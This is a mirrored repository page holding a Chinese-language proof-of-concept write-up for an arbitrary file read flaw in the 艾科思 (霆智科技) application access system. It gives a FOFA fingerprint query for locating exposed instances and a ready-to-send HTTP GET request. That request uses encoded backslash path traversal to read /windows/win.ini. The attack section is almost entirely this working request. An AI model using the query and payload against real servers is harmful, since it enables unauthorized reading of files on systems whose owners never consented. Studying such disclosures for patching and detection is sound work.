crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 21:04:50 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/艾科思(霆智科技)应用接入系统存在任意文件读取漏洞.md

30 lines
1.4 KiB
Markdown
Raw Permalink Normal View History

20250402 update
2025-04-02 22:36:18 +08:00
# 艾科思(霆智科技)应用接入系统存在任意文件读取漏洞
# 一、漏洞简介
艾科思应用接入系统(霆智科技的VA虚拟应用平台)是一个创新的技术平台旨在为用户提供虚拟助手Virtual Assistant的功能和服务。虚拟助手是一种人工智能系统通过自然语言处理、机器学习和其他相关技术能够与用户进行对话并执行各种任务和服务。该系统存在任意文件读取漏洞
# 二、影响版本
+ 艾科思应用接入系统(霆智科技的VA虚拟应用平台
# 三、资产测绘
+ fofa`body="EAA益和应用接入系统"`
+ 特征
![1696134097313-5de6d021-a63d-484a-a589-463d433d0311.png](./img/3KpyFjAQUmuFS8mN/1696134097313-5de6d021-a63d-484a-a589-463d433d0311-434273.png)
# 四、漏洞复现
```plain
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate Connection: keep-alive
```
![1696134155798-c4e50cfe-ddcf-4a0a-94c0-1490816c96a8.png](./img/3KpyFjAQUmuFS8mN/1696134155798-c4e50cfe-ddcf-4a0a-94c0-1490816c96a8-405843.png)
> 更新: 2024-02-29 23:55:47
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fi90duzlpyhfdgtx>
Reference in New Issue Copy Permalink